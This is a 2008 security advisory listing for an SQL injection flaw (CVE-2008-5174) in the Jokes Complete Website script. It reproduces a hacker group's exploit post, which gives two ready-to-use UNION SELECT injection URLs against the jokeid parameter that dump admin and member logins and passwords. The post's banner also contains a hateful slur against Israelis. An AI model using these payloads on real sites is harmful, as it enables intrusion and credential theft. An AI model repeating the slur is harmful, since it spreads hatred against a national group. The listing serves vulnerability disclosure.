Topic : | Jokes Complete Website 2.1.3 (jokeid) SQL Injection Vulnerability
|
SecurityAlert : 4613
CVE : CVE-2008-5174
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : cyb3r-1st
Published : 21.11.2008
Affected Software : | easysitenetwork:jokes_complete_website:2.1.3 |
 Advisory Content :
| \ \____/ >> Kings of injection
<<!>> Found by : Cyb3r-1sT
<<!>> C0ntact : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at]
yahoo.com
<<!>> Groups : InjEctOr5 T3am
=======================================================
+++++++++++++ R3membeR Kings of injection +++++++++++++
=======================================================
<<->> script : Jokes Website
<<->> Demo site : www.easysitenetwork.com/sites/jokes
=======================================================
++++++++++++++++ pWning israel fuckers ++++++++++++++++
=======================================================
<<->> D0rk : N0-WaY
<<->> Exploit :
<!> for admin inf0 ::
>>>>
www.site.me/patch/joke.php?jokeid=-9999999+union+select+0,concat(login,0x3a
,password),2,3,4,5,6,7+from+admin_login/*
<!> for members inf0 ::
>>>>
www.site.me/patch/joke.php?jokeid=-9999999+union+select+0,concat(login,0x3a
,password),2,3,4,5,6,7+from+users/*
=======================================================
+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
=======================================================
<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $
nicehacker $ anaconda-ksa $ sirus $ crazy-x
:: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y
<<->> InjEctOr5 TeaM
<<->> All muslims
References :
http://securityreason.com/expldownload/1/4204/1 (Exploit)
http://www.securityfocus.com/bid/29968
http://www.milw0rm.com/exploits/5948
http://secunia.com/advisories/30860
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|